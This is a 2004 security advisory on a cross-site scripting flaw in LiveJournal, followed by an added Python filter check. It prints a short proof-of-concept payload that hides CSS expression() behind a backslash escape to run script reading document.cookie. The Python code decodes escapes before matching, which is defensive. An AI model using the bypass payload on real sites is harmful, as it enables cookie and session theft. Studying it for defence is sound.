LiveJournal CSS HTML Injection Vulnerability


=====[BEGIN-SCL-REPORT]=====
 
________________________________________________________________________

                   Scovetta Labs Security Advisory

 Title:         LiveJournal CSS HTML Injection Vulnerability
 Status:        Public
 Release Date:  2004-02-23
________________________________________________________________________

 Package:       LiveJournal
 Vendor:        LiveJournal - www.livejournal.org
 Priority:      Medium
 Vulnerability: Cross-Site Scripting


Affected Versions:
==================

 Unknown.


Description:
============

 LiveJournal is reportedly prone to HTML injection via Cascading Style 
 Sheet (CSS) tags. It is possible to inject hostile HTML and script 
 code into journal entries through this vulnerability.

 This could potentially be exploited to steal cookies from other site 
 users. Other attacks are also possible. 


Exploit:
========

 <style>
  .test1 { color:e\xpression(alert(document.cookie)); }
 </style>

 <a class="test1">foo</a> 
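
 Added example, not part of the original advisory and not LiveJournal
 code: a filter-side check that resolves CSS backslash escapes before
 looking for expression(), which is why the escaped keyword above gets
 past a plain string match. It assumes expression() is Internet
 Explorer's script-evaluating CSS extension; the function and constant
 names are hypothetical.

```python
import re

# CSS escape: backslash + 1-6 hex digits (+ one optional whitespace), or
# backslash + any other single character, which then stands for itself.
CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|([^\r\n\f]))")
STYLE_BLOCK = re.compile(r"<style\b[^>]*>(.*?)</style\s*>", re.I | re.S)
STYLE_ATTR = re.compile(r"""\bstyle\s*=\s*("[^"]*"|'[^']*')""", re.I)
EXPRESSION = re.compile(r"expression\s*\(", re.I)


def decode_css_escapes(css):
    """Return CSS text with backslash escapes resolved, as a browser reads it."""
    def repl(match):
        if match.group(1) is None:
            return match.group(2)      # "\x" -> "x" because x is not a hex digit
        cp = int(match.group(1), 16)
        valid = 0 < cp <= 0x10FFFF and not 0xD800 <= cp <= 0xDFFF
        return chr(cp) if valid else "\ufffd"
    return CSS_ESCAPE.sub(repl, css)


def find_css_expression(html):
    """Return decoded CSS fragments (style blocks and attributes) that call expression()."""
    fragments = [m.group(1) for m in STYLE_BLOCK.finditer(html)]
    fragments += [m.group(1)[1:-1] for m in STYLE_ATTR.finditer(html)]
    decoded = (decode_css_escapes(f).strip() for f in fragments)
    return [css for css in decoded if EXPRESSION.search(css)]


# The advisory's markup, followed by a harmless entry constructed for contrast.
ADVISORY_ENTRY = r"""<style>
 .test1 { color:e\xpression(alert(document.cookie)); }
</style>
<a class="test1">foo</a>"""
BENIGN_ENTRY = '<p style="color: red">an expression (of thanks)</p>'

if __name__ == "__main__":
    # A keyword match on the raw entry misses the escaped form.
    print("raw keyword match:", bool(EXPRESSION.search(ADVISORY_ENTRY)))
    print("after decoding:   ", find_css_expression(ADVISORY_ENTRY))
    print("benign entry:     ", find_css_expression(BENIGN_ENTRY))
```

 Decoding before matching closes this particular gap; accepting only
 known-safe CSS properties and values is the more robust design than
 rejecting keywords.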


Vendor Response:
================

 Unknown.


Credits:
========

 Michael Scovetta of Scovetta Labs discovered this vulnerability.


References:
===========
 [0] http://www.secumania.org/security/vulnerabilities/livejournal-css-html-injection-vulnerability-2004022311604/
 

Disclaimer
==========

 The content of this report is purely informational and meant only 
 for the purpose of education and protection. Scovetta Labs and 
 Michael Scovetta shall in no event be liable for any damage 
 whatsoever, direct or implied, arising from use or spread of this 
 information. All identifiers (hostnames, IP addresses, company names, 
 individual names etc.) used in examples and demonstrations are used 
 only for explanatory purposes and have no connection with any real 
 host, company or individual. In no event should it be assumed that 
 use of these names means specific hosts, companies or individuals 
 are vulnerable to any attacks nor does it mean that they consent to 
 being used in any vulnerability tests. The use of information in 
 this report is entirely at user's risk.

 
Copyright
=========
 
 (c) 2004 Michael Scovetta. Forwarding and publishing of this document 
 is permitted providing the content between "[BEGIN-SCL-REPORT]" and
 "[END-SCL-REPORT]" marks remains unchanged.


=====[END-SCL-REPORT]=====